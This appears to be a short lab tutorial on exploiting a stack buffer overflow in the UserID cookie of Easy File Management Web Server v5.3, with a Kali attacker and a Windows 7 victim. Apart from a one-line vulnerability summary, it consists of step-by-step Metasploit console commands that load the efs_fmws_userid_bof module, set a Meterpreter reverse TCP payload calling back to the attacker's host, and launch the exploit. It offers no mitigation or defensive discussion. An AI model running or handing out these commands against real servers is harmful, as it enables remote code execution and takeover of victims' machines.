Easy File Management Web Server v4.0 and v5.3 contains a stack buffer overflow condition that is triggered as user-supplied input is not properly validated when handling the UserID cookie. This may allow a remote attacker to execute arbitrary code.

Exploit Targets

Easy File Management Web Server v5.3

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/windows/http/efs_fmws_userid_bof

msf exploit (efs_fmws_userid_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (efs_fmws_userid_bof)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (efs_fmws_userid_bof)>set rhost 192.168.1.2 (IP of Remote Host)

msf exploit (efs_fmws_userid_bof)>exploit